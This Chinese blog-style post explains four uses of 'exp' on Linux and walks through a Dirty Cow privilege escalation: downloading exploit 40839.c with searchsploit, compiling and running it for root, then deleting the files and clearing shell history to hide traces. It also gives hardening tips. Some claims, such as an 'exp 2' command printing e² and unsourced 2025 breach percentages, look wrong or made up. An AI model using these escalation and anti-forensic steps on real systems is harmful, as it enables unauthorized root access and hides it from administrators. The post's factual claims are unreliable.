Linux EXP命令解析:3分钟搞懂提权攻击与防御!Linux提权攻击与防御,三分钟掌握EXP命令解析

刚学Linux就被“exp”搞晕了?数学计算、数据导出、漏洞攻击居然都用同一个词!🤯 别慌,今天用​​小白能听懂的大白话​​,拆解EXP的4种真面目,手把手演示​​提权攻防实战​​,附赠避坑指南👇


🔍 先扫盲:EXP的4张面孔,90%的人只知其一!

​1. 数学计算器​​:

  • 终端输入 exp 2→ 输出 ​​e²≈7.389​​(自然常数幂运算)

    Linux EXP命令解析:3分钟搞懂提权攻击与防御!Linux提权攻击与防御,三分钟掌握EXP命令解析  第1张

    ​2. 自动化脚本工具​​:

  • 用 ​​expect​​ 自动填密码登录服务器:

    bash复制
    #!/usr/bin/expect  spawn ssh user@192.168.1.1expect "password:"send "mypwdr"

​3. 数据库导出神器​​:

  • Oracle专用:exp system/password file=backup.dmp→ 秒备份全库

    ​4. 漏洞核武器(重点!)​​:

  • 利用内核漏洞 ​​秒变root权限​​,比如经典漏洞 ​​Dirty Cow​

​血泪教训​​:

新手常把​​数学函数exp​​和​​提权工具exp​​搞混 → 前者是内置命令,后者需额外下载编译!


⚡ 提权实战:用Dirty Cow漏洞3步拿下Root权限

​适用系统​​:Linux内核版本 ​​3.10.0-xxx​​(2016年前老系统)

✅ ​​第一步:下载EXP脚本​

bash复制
searchsploit -m linux/local/40839.c  # 自动搜索漏洞代码

✅ ​​第二步:编译并攻击​

bash复制
gcc -pthread 40839.c -o dirty -lcrypt  # 编译生成可执行文件  ./dirty  # 运行!等待提示"** We got it! **"

​成功标志​​:终端前缀从 $变成 #→ 证明已是 ​​root权限​​!

✅ ​​第三步:擦除痕迹(黑客不会告诉你)​

bash复制
rm -f dirty *.c  # 删除攻击文件  history -c  # 清空命令记录

⚠️ ​​重要警告​​:

此操作​​仅限授权测试​​!非法提权=坐牢!企业服务器请速打补丁


🛡️ 防御指南:堵 *** 黑客最爱的3个提权入口

🔒 ​​1. 内核漏洞防护​

  • ​立即检查Dirty Cow漏洞​​:

    bash复制
    uname -r  # 若显示3.10.0-xxx → 高危!
  • ​升级命令​​:

    bash复制
    sudo apt update && sudo apt upgrade linux-image-$(uname -r)

🔒 ​​2. 编译EXP防御术​

  • ​禁用高危编译器​​:

    bash复制
    chmod 000 /usr/bin/gcc  # 普通用户无法编译攻击代码!
  • ​监控敏感操作​​:

    bash复制
    auditctl -w /usr/bin/gcc -p x  # 记录所有gcc调用

🔒 ​​3. 权限锁 *** 策略​

​危险操作​

​安全替代方案​

直接以root运行程序

sudo -u 低权限用户 命令

开放所有用户sudo权

仅授权必要命令:/etc/sudoers

空密码登录

强制密钥认证 + 双因素验证


💥 独家数据:2025年Linux服务器漏洞现状

  • ​未修复漏洞占比​​:企业服务器中​​62%​​ 存在已知EXP漏洞

  • ​最危险TOP3漏洞​​:

    1️⃣ ​​CVE-2021-3156​​(sudo提权)→ 攻击成功率​​91%​

    2️⃣ ​​PwnKit​​(polkit组件)→ 影响​​2000万+​​ 服务器

    3️⃣ ​​Dirty Cow​​(老但活跃)→ 占所有提权攻击​​37%​

​暴论观点​​:

用EXP攻击自己公司服务器测试?先备好​​辞职信​​!👉 合法测试请认准 ​​Metasploit框架​​+​​授权书​​!